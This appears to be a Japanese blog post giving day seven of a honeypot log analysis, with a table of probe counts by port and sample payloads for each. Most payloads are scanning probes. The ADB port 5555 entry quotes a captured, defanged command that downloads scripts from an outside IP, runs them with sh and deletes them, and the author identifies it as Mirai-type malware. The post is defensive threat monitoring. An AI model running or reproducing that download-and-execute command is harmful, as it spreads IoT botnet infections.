ハニーポット分析(7日目:8/14)
ハニーポットの分析7日目です。
そろそろログも1週分溜まったので、週末にまとめ的なものを作ろうとと思います。
Honeytrap 分析 8/14
検知数 9445 件
ペイロード有 4327件
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,600 | 36.98% | 調査行為 |
3389 | RDP | 1,134 | 26.21% | 調査行為 |
22022 | SSH | 201 | 4.65% | 調査行為 |
222 | SSH | 201 | 4.65% | 調査行為 |
22220 | SSH | 91 | 2.10% | 調査行為 |
81 | GoAhead Web Server | 62 | 1.43% | 調査行為 |
1433 | Microsoft SQL Server | 57 | 1.32% | 調査行為 |
8080 | PROXY | 52 | 1.20% | 調査行為 |
5555 | Android Debug Bridge (ADB) | 39 | 0.90% | マルウェアダウンロード |
6666 | ? | 39 | 0.90% | 調査行為 |
ポート:445
NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12
ポート:3389
Cookie: mstshash=hello
ポート:22022, 222, 22220
SSH-2.0-libssh2_1.4.3
ポート:81
GET login.cgi HTTP/1.1
ポート:1433
SQL-32160.1x.14x.18xODBC
ポート:8080
GET / HTTP/1.1
ポート:5555
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp[:]//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp[:]//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
→Mirai系のマルウェア
ポート:6666
Cookie: mstshash=hello
SMB PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
各ポートで検知数が多いペイロードを記載しています。調査行為がほとんどで、あとはIoTを狙ったものでした。
何か攻撃実行が容易な脆弱性が発見されれば、何か見つけることも出来そうですが、それまでは大きな変化はないかなーと思ってます。なので、気長に続いていこうと思います。
以上、分析結果でした。